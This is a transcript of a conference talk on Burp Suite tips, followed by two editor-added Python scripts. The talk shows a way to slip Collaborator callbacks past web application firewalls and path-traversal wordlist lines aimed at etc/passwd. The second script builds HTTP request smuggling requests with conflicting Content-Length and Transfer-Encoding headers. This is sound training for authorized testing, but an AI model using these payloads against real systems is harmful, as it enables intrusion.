It's a pleasure to be here once again. I think that's my third edition. I did a similar talk ten years ago, like "plenty of tips", so luckily we have different content for this year.

So, quickly introducing myself: I'm French, you probably noticed the accent already. I own a company, like a one-guy company, and as said during the introduction, I'm an official Burp Suite training partner, mostly for Europe, but given I love Canada, if I have customers in Canada that will be welcome. I train nearly 100 people a year. So that's a lot of... I mean, anyway, you are here for the tips.

So what is the plan? First, I have a few tips for core tools, so tools which are here by default. Then I will discuss a few extensions. Then I have a few other subjects, depending on the time left. And after that we have beers and the CTF and enjoying Montreal by itself.

Regarding Proxy history: my point is to be as lazy as possible. So if I have to scroll through the results, that's probably useless and I want to avoid that. If we look at Burp Suite, the default sorting order in Proxy history is the oldest on top, so you are constantly scrolling and scrolling to the newest content. The solution is super easy: you can simply double-click here and have the newest entries on top, and that's quite comfortable. It also works for Logger; you can apply the same sorting in Logger and Logger++ too. In short, if you are scrolling to see the new results, you probably have to change the sorting criteria.

Okay, second problem in Proxy history: you want to map a specific action, like clicking on a button in a mobile app or following a link, to a specific set of resources.
So what I do, for example, in Proxy history: I will tag the topmost entry, then I will do something like, I don't know, accessing a website, a complex one like Solar, and here I can easily map: everything which is higher than the grey line is related to my latest action. A variant of this strategy is that I will intercept the traffic, access a specific host, switch back to Proxy, and here I can colorize directly from this menu. So it's the same outcome but with a different workflow, and I switch back to the classic Proxy history and I can see the very first request is grey... green, sorry.

Okay, that's some beginner stuff. Let's discuss Repeater. So in Repeater, on the left we have the request, on the right we have the response, and quite often we are interested in a specific location of the response. I have an example for that. Okay, "scroll to match". This is WebGoat, so that's a vulnerable web app; we can see here that this parameter is used in a command and the command output is somewhere in the response. So the less efficient strategy would be to scroll and simply go to the location. Something a little bit better would be to search: you can see at the bottom I can go directly to this entry, but every time I send a new request I have to scroll again. So behind the cog you have this entry, and then the response will be scrolled every time you have new content. So if I submit my request, I go directly to the location I'm interested in, so I don't need to scroll and I don't need to spend any time looking for the interesting piece of data.

What else? Since a few years or months, we can create colors... I mean, create groups, and put Repeater tabs inside groups.
So that's very useful. A related feature which is little known is the hotkey for search... search tabs, exactly. I use Ctrl+Shift+S and we get a list of all tabs, so we can just navigate using the up and down keys, and if I type some text like "Piper" I see directly, and only, the relevant entries. So when you have 50 or 80 entries that's very, very useful. Of course, you need to put correct names, but I mean you probably have to do it anyway.

Okay, let's discuss Intruder. In Burp Suite Pro, and not in the Community version, there are some interesting features in Intruder. When you are using a simple list, as I do here, you have a drop-down menu at the top with plenty of wordlists, and that's useful by itself. It's possible to customize the wordlists. So from the menu bar I go to "Configure predefined payload lists", and here I can use the built-in ones, this is the default value, or point to a specific directory. That's what I do here. Here we go, and now I go to the same menu and I have only my own wordlists. If I want my own plus the built-in ones, I can go back to the same menu and click on "Copy", which will export or dump, and that will extract the built-in wordlists directly to my hard drive. It takes a few seconds. Here we go, and now I have the built-in wordlists on top and at the very end my own wordlists.

Yeah, what else? So this feature, the fact that we can customize wordlists and there are built-in lists, that's very nice. Let's say something negative: there are placeholders in wordlists.
So let me show you them. If I use "Fuzzing - full", you can see "base" here, and if we go below we can see "your email" here or "your server name" here, and if you want to fully use a wordlist you need, of course, to replace these values with real ones. There are a few payload processing options relevant to this feature. On the screenshot you see the first one will replace "base" with the base value stored in Positions, "domain" will use a unique Collaborator hostname, and for all the other placeholders you need to customize manually. So here I will replace "file" with etc/passwd and "your email" with my own email address. It's currently a mess, as you can see, and as listed on the previous slide, the syntax: we have curly brackets versus angle brackets, and we have "file" versus "known file". So they have to clean that, but in all cases we have to manually replace the values, and I think that plenty of bugs were missed just because users were looking for ../../../{file} and never finding the real file, of course.

Okay, something about Collaborator. So Collaborator is a way to get notifications from the web app, and a very common assumption is that if you want to get a Collaborator pingback you must use the Collaborator domain name. We will simplify: we will consider only the public Collaborator server. So is this assumption really true? That's the question, and you can imagine that if the answer were yes I would not have this content in my slides. So the answer is no, or it depends: for DNS pingbacks you must use the Collaborator domain name; for HTTP interactions you can use any domain name as long as it points to the correct IP address. I could do it live, but I mean I did it live five minutes ago. I will take a Collaborator hostname.
So that's the public server and that's my Collaborator ID, or hostname, and it points to several IP addresses, but we will use this one, 44.77, etc. And we will use another domain name resolving to the same IP. So nip.io is a free service, and this is the IP address hex-encoded, and this is just a random string, I mean not so random, of course. So we have a domain name pointing to the Collaborator IP address, and my hostname is rsn, etc., etc. And it works surprisingly well. Here I will simply access Collaborator via my own domain name and put my Collaborator hostname directly in the path. It could be in a parameter name, it could be in a parameter value, and as you can see the interaction is correctly linked to my own instance of Burp Suite. We can see here "rsn", this is my Collaborator ID. And we can do... I mean there are plenty of ways. That's another one. Oops, my bad. I use my Collaborator ID as the User-Agent, and once again the traffic is correctly correlated to my own interactions. And I mean, if the web application firewall is looking for the domain name here, there's no way to find it. Okay, so we have a clean bypass in most situations.

Okay, let's discuss extensions.
Hackvertor is a Swiss army knife: you can do whatever you want. It's XML, or similar to XML, tags, and you can chain them, so you can apply several transformations on the fly. That's a basic example: here we have a string and we will compress the string, and the resulting binary data will be Base64-encoded, and we get something like that. So that's a minimalist example. We can generate fake data, and that's very useful when you have to generate unique values: if you are creating users or, let's say, files via an API, you probably have to provide unique file names or unique user names, and you can use the fake hacker, fake book, fake company tags in order to generate valid but random data, like in this example. I'm just asking for sentences and we get a few sentences generated on the fly. We can go to a more complex solution: here I will encode my email address and put that in a variable called "email", and the flag here means the variable is global, so we can reuse it anywhere in Burp, in a different tab, in a different tool, somewhere else, possibly in Intruder. I will get my variable and maybe iterate on "uid", for example, and everything is in a JWT tag, and Hackvertor will generate tokens on the fly. So as soon as you have been able to leak the secret key, you can generate tokens on the fly simply using Intruder plus Hackvertor.

If there's anybody doing HTTP smuggling, you probably know that managing sizes is a mess, because we usually have two sizes and we need to manage them dynamically. So it's a complex Hackvertor setup, but it does exactly that: we have some text here in the middle, and on the line above we will get the exact decimal size of the chunk, and here in Content-Length we will have the size of the size, so the length of the size plus two, using the arithmetic tag. And I think I have a demonstration. Not sure if you can read anything. Can you read something?
Yeah, okay. Because in Hackvertor we can't set the font size, so that's a problem, but as you can see here I have a short string: the size is 8 here and the Content-Length is 3. But if I add some characters, okay, we can see that now the size is 26, so that's one extra character, and the Content-Length is now 4 instead of 3. That looks like nothing, but you can pay attention to this section because maybe you are exploiting a complex bug and you don't want to spend any brainpower managing the sizes manually. And we can go very far, so I will stop giving examples. Yes, that's a specific application where you need to sign the body of the request with the CSRF token, and that could be done on the fly with Hackvertor. Okay, and there's much more: we can execute Python code, we can execute a system command like cat whatever, we can access the execution context so we can have the URL, the value of a specific parameter. I mean, the more time you spend with Hackvertor the more you like it. It's really good. There's a big disadvantage: using tags will break Burp's syntax parsing, and that has a few side effects, but yeah, we don't really care; it's not something that will forbid us to use the extension.

Okay, Piper. I need to go quite fast. So Piper: the idea is interesting, you can execute anything running on your workstation or laptop directly in Burp. It could be an interpreter like Python, it could be any command-line or GUI application you have locally. So I have a few examples. Let's switch to... Okay, so on the right I have the response, which is a big blob of JSON data, and I want to make sense of the data. So in Piper I will enable the gron entry, and the configuration is very basic: if the body starts with a square or curly bracket then I pass the response body to gron, and the result appears directly in Burp. That's all we need here.
I have a new tab here labeled "gron", and if I click there I see the response body processed by gron, and I have nothing else to do, just define a filter and define which command should be executed. If you prefer, let's say, jq, we could have exactly the same config for jq. That was gron. And Okular: so Okular is a PDF reader, but never mind, any PDF reader will work, and we have a similar configuration: if the response starts with a PDF tag, the PDF magic, then we enable a PDF reader in the contextual menu. So here I can go to Extensions, Piper, and given we have the PDF magic, I can directly open the response in the file viewer. So if you are processing a lot of complex files, it's very efficient compared to exporting to a file, removing the headers, changing the extension, etc., etc. Last demonstration for Piper: we will compare some entries. I'm not very happy with the built-in Comparer, and I will take three requests, so the three yellow ones here. Right-click, and here is the menu. It will appear only if we have two or three entries, because Meld can compare two or three files, and I will compare the requests, and I get directly the files, I mean the traffic saved to disk, and we can see the file names here, temporary file names, and the Meld command line is generated on the fly then executed. So that's very, very convenient.

Okay, Burp Bounty. It's an extension used to write your own scanning checks, but I think it will die soon, because we have a core feature called BChecks that should be released in a few weeks. Then you have a scripting language, and you can define your payload here, I mean your attack, then you define how to identify a vulnerability, and you have some meta-information here, and I hope the community will share this kind of recipe publicly. You have a link to a video describing the feature in the notes.

What else? I need to go very fast. Keyboard shortcuts.
There are plenty of keyboard shortcuts. If you want to be very efficient you need to use a combination of shortcuts. So switching from Proxy history to Repeater, that's three actions: sending to Repeater, we have Ctrl+R; switching to the Repeater tab, that's Ctrl+Shift+R; and emitting the Repeater request, that's Ctrl+Space. So if I do it, I pick an entry and I will use a shortcut, so Ctrl+R, Ctrl+Shift+R, Ctrl+Space, and it takes like one or two seconds to switch from Proxy history to Repeater. You will use muscle memory, so you will not think about the three hotkeys; it's just a complex hotkey bringing you directly to Repeater.

Poor man's automation: that's when you are looking for bugs, like in bug bounty, but you are on holidays or you are coming to NorthSec and you want to look for vulnerabilities anyway. So we need two ingredients: we need a live task in Burp, and we need a very specific configuration. The live task will monitor Proxy history, and every item appearing in the Proxy history will be scanned, so in most situations that's very dangerous. We will combine that with ffuf, and in ffuf we will use a specific option, I will show the option, which is -replay-proxy, and all the interesting entries will be relayed through a proxy. So we combine ffuf here, looking for status code "all", and every finding will be piped, I mean forwarded, to Burp, and in Burp we have this configuration: we have a live task monitoring the proxy, whatever the scope is, I mean whatever the hostname is, we will trigger an active scan. So for sure that's not very advanced, it's not a real pentest, but if you are on holidays it's better than nothing. And you could even run ffuf on a VPS and forward to Burp through an SSH listener, so you have Burp locally and you have ffuf on a remote server and they are talking one to the other. That's quite elegant.

Okay, not sure how much time I have left. Something about performance.
I very, very often have some feedback about Burp being resource-intensive. My opinion is very clear: computers are cheaper than brains. So you can send this slide to your boss or manager: you want a computer which is larger than necessary, and whatever you are doing, like running Burp or running VMs, etc., that should not be something slowing you down. I mean, it's already difficult to find vulnerabilities, so having a decent computer, I think it's a good idea.

How to stay up to date? So of course, these are just a few tricks. PortSwigger has a channel on YouTube; they have very short videos and very long ones, both are very good. They have a bunch of Twitter accounts, plus all the accounts of the employees themselves. I have a Twitter account dedicated to Burp, so I have my real account and this one is exclusively related to Burp tips or links or whatever.

I'm nearly on time. So if you want to access the slides, they are already online, so you can just get them. And what else? If you like what you saw, I will release a workshop for free next month. So next month there's a free online conference called NahamCon and I will have, I'm not sure, a 60- or 90-minute workshop related to session management, like cookies and JSON tokens, whatever. So that's a bit later, and I think I'm nearly on time. Thanks for listening, and if you have any questions they are welcome if we have the time. I will be at the CTF Friday evening, with no goal to score anything, so if you have any questions relating to the challenges and how we could automate them, that would be like a fun subject. Thanks for listening.
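Added example for the Intruder wordlist placeholder problem raised above (the mixed {base} / <base> syntax and "file" versus "known file" names, where only some placeholders get filled by payload processing). This is editor-added code, not the speaker's nor PortSwigger's: it rewrites a list on disk before you load it as a custom wordlist, so every line carries a real value and nothing is left fuzzing a literal "{file}". The placeholder names, the sample lines and the values are constructed for the example; the Collaborator hostname is a dummy.

```python
"""Fill Intruder wordlist placeholders before loading the list into Burp.

Handles both bracket styles ({name} and <name>), treats "known file" as
"file", and reports any placeholder it could not fill so nothing silently
stays literal. Sample lines and values are constructed for this example.
"""
import re
import sys
from typing import Dict, Iterable, List, Tuple

# Matches {name} or <name>; "name" may contain spaces, e.g. "known file".
PLACEHOLDER = re.compile(r"\{([^{}<>]+)\}|<([^{}<>]+)>")


def normalize_name(name: str) -> str:
    """Canonical key: lowercase, collapse whitespace, drop a 'known ' prefix."""
    key = " ".join(name.strip().lower().split())
    if key.startswith("known "):
        key = key[len("known "):]
    return key


def fill_placeholders(line: str, values: Dict[str, str]) -> Tuple[str, List[str]]:
    """Return (rewritten line, raw names of placeholders left unfilled)."""
    missing: List[str] = []

    def repl(m):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        key = normalize_name(raw)
        if key in values:
            return values[key]
        missing.append(raw)
        return m.group(0)  # unknown placeholder: leave it visible, report it

    return PLACEHOLDER.sub(repl, line), missing


def process_wordlist(lines: Iterable[str], values: Dict[str, str]) -> Tuple[List[str], Dict[str, int]]:
    """Rewrite every line; return the new list and a count of unfilled names."""
    out: List[str] = []
    unfilled: Dict[str, int] = {}
    for line in lines:
        new, missing = fill_placeholders(line.rstrip("\n"), values)
        out.append(new)
        for name in missing:
            unfilled[name] = unfilled.get(name, 0) + 1
    return out, unfilled


# Constructed sample lines mimicking the mixed syntaxes seen in built-in lists.
SAMPLE_LINES = [
    "../../../{file}",
    "..\\..\\..\\<known file>",
    "http://{base}/login",
    "{your email}",
    "<Your Server Name>",
    "http://{domain}/x",
    "{not a real placeholder}",
]

# Per-engagement values (assumed names; "domain" gets a dummy Collaborator host).
VALUES = {
    "file": "etc/passwd",
    "base": "target.example",
    "your email": "tester@example.com",
    "your server name": "attacker.example",
    "domain": "abc123.collaborator.example",
}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python fill_wordlist.py list.txt > list.filled.txt
        with open(sys.argv[1], encoding="utf-8") as fh:
            source = fh.readlines()
    else:
        source = SAMPLE_LINES
    rewritten, unfilled = process_wordlist(source, VALUES)
    print("\n".join(rewritten))
    for name, count in unfilled.items():
        print(f"# unfilled placeholder {name!r} x{count}", file=sys.stderr)
```

Run it against an exported built-in list (the "Copy" export described above) and load the output as your custom list; anything reported on stderr is a placeholder the script did not know about and would otherwise have been fuzzed literally.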
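Added example for the HTTP request smuggling size management discussed in the Hackvertor section above. This is editor-added code, not the speaker's and not Hackvertor's: it computes, for a given chunk payload, the chunk-size line and the Content-Length that covers only that size line plus its CRLF (the "length of the size plus two" from the talk), and assembles a request carrying both headers so the sizes are recomputed every time the payload changes. The chunk-size line is written in hexadecimal as RFC 9112 requires; for the demo's values the digit count, and so the Content-Length (3 for an 8-byte chunk, 4 for a 26-byte one), comes out the same. Host, path and payloads are constructed.

```python
"""Recompute both sizes of a chunked request body from the payload.

The Content-Length is set to cover only the chunk-size line and its CRLF,
so a parser honouring Content-Length sees a body that ends right after the
size line while one honouring Transfer-Encoding reads the whole chunk. The
sample host, path and payloads are constructed for the example.
"""
from typing import Tuple

CRLF = "\r\n"


def chunk_sizes(payload: bytes) -> Tuple[str, int]:
    """Return (hex chunk size, Content-Length covering 'size\\r\\n' only)."""
    size = format(len(payload), "x")
    return size, len(size) + len(CRLF)


def build_body(payload: bytes) -> bytes:
    """Chunked body: size line, payload, CRLF, then the terminating 0 chunk."""
    size, _ = chunk_sizes(payload)
    crlf = CRLF.encode()
    return size.encode() + crlf + payload + crlf + b"0" + crlf + crlf


def build_request(host: str, path: str, payload: bytes) -> bytes:
    """Assemble a POST that carries both Transfer-Encoding and Content-Length.

    Both values are derived from the payload at build time, which is the
    whole point: change the payload and the sizes follow, no manual counting.
    """
    size, content_length = chunk_sizes(payload)
    headers = (
        f"POST {path} HTTP/1.1{CRLF}"
        f"Host: {host}{CRLF}"
        f"Content-Type: application/x-www-form-urlencoded{CRLF}"
        f"Content-Length: {content_length}{CRLF}"
        f"Transfer-Encoding: chunked{CRLF}{CRLF}"
    ).encode()
    return headers + build_body(payload)


if __name__ == "__main__":
    # Same shape as the demo: an 8-byte chunk, then a 26-byte one.
    for sample in (b"abcdefgh", b"a" * 26):
        print(len(sample), "->", chunk_sizes(sample))
    print(build_request("target.example", "/", b"abcdefgh").decode())
```

Payloads are taken as bytes on purpose: the chunk size counts octets, so a payload containing multi-byte characters must be encoded first, otherwise the size line is short and the request is malformed.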